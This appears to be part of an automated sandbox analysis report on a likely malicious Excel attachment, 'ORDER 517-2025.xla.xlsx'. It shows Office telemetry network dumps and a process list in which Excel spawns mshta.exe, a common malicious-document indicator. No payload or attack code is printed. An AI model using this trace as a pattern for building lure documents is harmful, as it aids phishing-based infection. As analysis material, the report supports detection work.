                      2025-03-26 07:25:23 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32
                      Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
                      2025-03-26 07:25:23 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                      Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
                      2025-03-26 07:25:23 UTC16384INData Raw: 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54
                      Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
                      2025-03-26 07:25:24 UTC16384INData Raw: 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d
                      Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
                      2025-03-26 07:25:24 UTC16384INData Raw: 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55
                      Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
                      2025-03-26 07:25:24 UTC16384INData Raw: 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20
                      Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
                      2025-03-26 07:25:24 UTC16384INData Raw: 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d
                      Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
                      2025-03-26 07:25:24 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20
                      Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.74970113.107.246.404437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      2025-03-26 07:25:30 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                      Host: otelrules.svc.static.microsoft
                      2025-03-26 07:25:30 UTC494INHTTP/1.1 200 OK
                      Date: Wed, 26 Mar 2025 07:25:30 GMT
                      Content-Type: text/xml
                      Content-Length: 2128
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                      ETag: "0x8DC582BA41F3C62"
                      x-ms-request-id: 0fe88ecf-101e-007a-32da-9b047e000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20250326T072530Z-17cccd5449bzw64jhC1EWRz2340000000g40000000001m8z
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2025-03-26 07:25:30 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.74970213.107.246.404437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      2025-03-26 07:25:30 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                      Host: otelrules.svc.static.microsoft
                      2025-03-26 07:25:30 UTC470INHTTP/1.1 200 OK
                      Date: Wed, 26 Mar 2025 07:25:30 GMT
                      Content-Type: text/xml
                      Content-Length: 204
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                      ETag: "0x8DC582BB6C8527A"
                      x-ms-request-id: fe09a350-901e-0048-3adf-9cb800000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20250326T072530Z-17cccd5449bvj9xqhC1EWRh59s0000000g3g000000002evm
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2025-03-26 07:25:30 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                      050100s020406080100

                      Click to jump to process

                      050100s0.0050100150200250MB

                      Click to jump to process

                      • File
                      • Registry

                      Click to dive into process behavior distribution

                      Target ID:0
                      Start time:03:24:14
                      Start date:26/03/2025
                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                      Imagebase:0x8c0000
                      File size:53'161'064 bytes
                      MD5 hash:4A871771235598812032C822E6F68F19
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                      Target ID:11
                      Start time:03:25:08
                      Start date:26/03/2025
                      Path:C:\Windows\SysWOW64\mshta.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                      Imagebase:0x3b0000
                      File size:13'312 bytes
                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                      Target ID:13
                      Start time:03:25:16
                      Start date:26/03/2025
                      Path:C:\Windows\splwow64.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\splwow64.exe 12288
                      Imagebase:0x7ff61a3d0000
                      File size:163'840 bytes
                      MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                      Target ID:15
                      Start time:03:25:31
                      Start date:26/03/2025
                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER 517-2025.xla.xlsx"
                      Imagebase:0x8c0000
                      File size:53'161'064 bytes
                      MD5 hash:4A871771235598812032C822E6F68F19
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                      No disassembly